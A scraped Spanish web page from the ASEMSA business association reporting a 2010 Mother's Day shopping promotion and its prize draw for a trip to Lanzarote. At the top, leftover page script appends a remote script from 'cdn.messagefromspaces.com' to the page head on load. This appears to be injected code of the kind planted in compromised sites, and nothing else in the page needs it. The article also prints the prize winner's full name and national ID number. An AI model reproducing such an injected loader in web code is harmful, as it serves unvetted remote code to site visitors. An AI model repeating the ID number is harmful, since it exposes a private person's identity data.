Campaña Día de las Madres | Asemsa , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Campaña Día de las Madres

Para  celebrar el Día de las Madres, cerca de 45 empresas  asociadas a ASEMSA ofrecieron a sus  clientes la posibilidad de ganar un viaje a Lanzarote para 2 personas durante un fin de semana.

Para optar a este viaje, los clientes debían realizar una compra o contratar un servicio en las empresas participantes durante tres semanas, del  19 de abril al 7 de mayo. A tal efecto, las empresas asociadas entregaron a los clientes papeletas que debían rellenar con sus datos, y posteriormente depositar en urnas dispuestas para la promoción.

El sorteo y entrega del premio tuvo lugar en el Mercado Municipal de El Sauzal el 07 de mayo de 2010. Junto al público, estuvieron presentes D. Mariano Pérez, Alcalde del municipio, Dña. Carmen Nieves Álvarez, Concejala de Comercio de El Sauzal, la Junta Directiva de la Asociación y también representantes de empresas integradas en ASEMSA. De esta manera, entraron en el sorteo cerca de once mil papeletas, una de las cuales pertenecía a D. Juan Carlos Hernández Martín, DNI: 43788617-K, persona agraciada con el premio, quien consumió durante los días de la promoción  en A COMER, comercio dedicado a la alimentación ubicado en el Mercado Municipal de El Sauzal.

Aviso Legal | Política de Privacidad | Desarrollado por E-Armas Consultores